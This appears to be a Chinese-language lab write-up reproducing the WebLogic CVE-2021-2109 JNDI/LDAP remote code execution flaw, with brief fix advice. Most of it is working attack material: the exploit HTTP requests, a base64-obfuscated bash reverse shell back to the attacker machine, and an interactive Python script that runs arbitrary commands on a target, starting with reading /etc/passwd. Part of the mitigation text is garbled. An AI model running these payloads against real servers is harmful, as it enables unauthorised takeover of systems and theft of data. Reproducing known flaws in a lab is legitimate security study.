WebLogic LDAP远程代码执行漏洞(CVE-2021-2109)
漏洞名称
- WebLogic LDAP远程代码执行漏洞
漏洞编号
- CVE-2021-2109
JNDI简介
-
JNDI是Java Naming and Directory Interface (Java命名和目录接口)的英文简写,
-
是为Java应用程序提供命名和目录访问服务的API (application programing interface,应用程序编程接口)。
漏洞描述
-
2020年11月19日,阿里云安全向Oracle官方报告了Weblogic Server远程代码执行漏洞。
-
攻击者可通过LDAP协议,实现JNDI注入攻击,加载远程CodeBase下的恶意类,最后执行任意代码从而控制服务器。
影响版本
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.3.0
- WebLogic Server 12.2.1.4.0
- WebLogic Server 14.1.1.0.0
实验环境搭建
- 靶机: docker weblogic 192.168.232.183
- LDAP:192.168.232.146
- 攻击机:kali ip:192.168.232.140
第一步 环境搭建
cd /Desktop/vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
第二步 访问靶机环境(7001是WebLogic的默认端口。)
http://192.168.232.183:7001/
第三步 访问漏洞点,查看是否有该漏洞
访问http://192.168.232.183:7001/console/css/%252e%252e%252f/consolejndi.portal 如果有此页面未授权可访问,且WebLogic为受影响的版本,则可能存在漏洞。
第四步 启动LDAP,
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
unzip JNDIExploit.v1.11.zip
java -jar JNDIExploit.v1.11.jar -i ip(攻击机地址)启动
复现步骤
第一步 配合WebLogic未授权漏洞,远程进行代码执行
GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1Host: 192.168.232.183:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
cmd: id
Cookie: ADMINCONSOLESESSION=gP6QBvU_6nELIrUKw_cS9md3rot7DdvT593UwSqzF20mWUOFjC7I!-1705112082
Connection: close
LDAP服务器地址的第三个分割符号为;
第二步 通过反弹shell,连接主机
bash -c {
echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMi4xNDAvODg4OCAwPiYx}|{
base64,-d}|{
bash,-i}
GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.232;146:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1Host: 192.168.232.183:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
cmd: bash -c {
echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMi4xNDAvODg4OCAwPiYx}|{
base64,-d}|{
bash,-i}
Cookie: ADMINCONSOLESESSION=gP6QBvU_6nELIrUKw_cS9md3rot7DdvT593UwSqzF20mWUOFjC7I!-1705112082
Connection: close
在/tmp下新建目录2021,新建qwe.txt内容为123456
查看docker下的文件
docker ps
docker exec -it 7f1c1a15677a /bin/bash
第三步 通过POC利用,进行命令执行
http://192.168.232.183:7001
ldap://192.168.232;146:1389
修复建议
-
由于是通过JNDI注入进行远程代码执行,建议升级Weblogic Server运行环境的JDK版本;
-
禁用T3协议如果您不依赖T3协议进行MM通信,通过暂时阻断T3协议缓解此漏洞带来的影响。1).进入 Weblogic控制台,在 base domain配置页面中,进入“安全"选项卡页面,点击筛选器",配置筛选器。2.在连接筛选器中输入: weblogic. security net Connection FilterImpl,在连接筛选器规则框中输入:**7001 deny t3t3s。
-
禁止启用|OP脊陆Mebg控制台,找到启用|P选项,取消勾选,重启生效
-
临时关闭后台/ console/console portal对外访间
-
升级官方安全补
poc
import requestsimport sys
import re
requests.packages.urllib3.disable_warnings()
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: Weblogic 多个版本 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m')
print('+------------------------------------------')
def POC_1(target_url, ldap_url, cmd):
vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url)
print('\033[36m[o] 正在请求: {}'.format(vuln_url))
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"cmd": cmd
}
try:
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "root:" in response.text:
print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url))
print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text))
else:
print("\033[31m[x] 命令执行失败 \033[0m")
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e)
def POC_2(target_url, ldap_url, cmd):
vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url)
print('\033[36m[o] 正在请求: {}'.format(vuln_url))
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"cmd": cmd
}
try:
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
print("\033[32m[o] 响应为:\n{} \033[0m".format(response))
except Exception as e:
print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
ldap_url = str(input("\033[35mLdap >>> \033[0m"))
POC_1(target_url, ldap_url, cmd="cat /etc/passwd")
while True:
cmd = input("\033[35mCmd >>> \033[0m")
if cmd == "exit":
sys.exit(0)
else:
POC_2(target_url, ldap_url, cmd)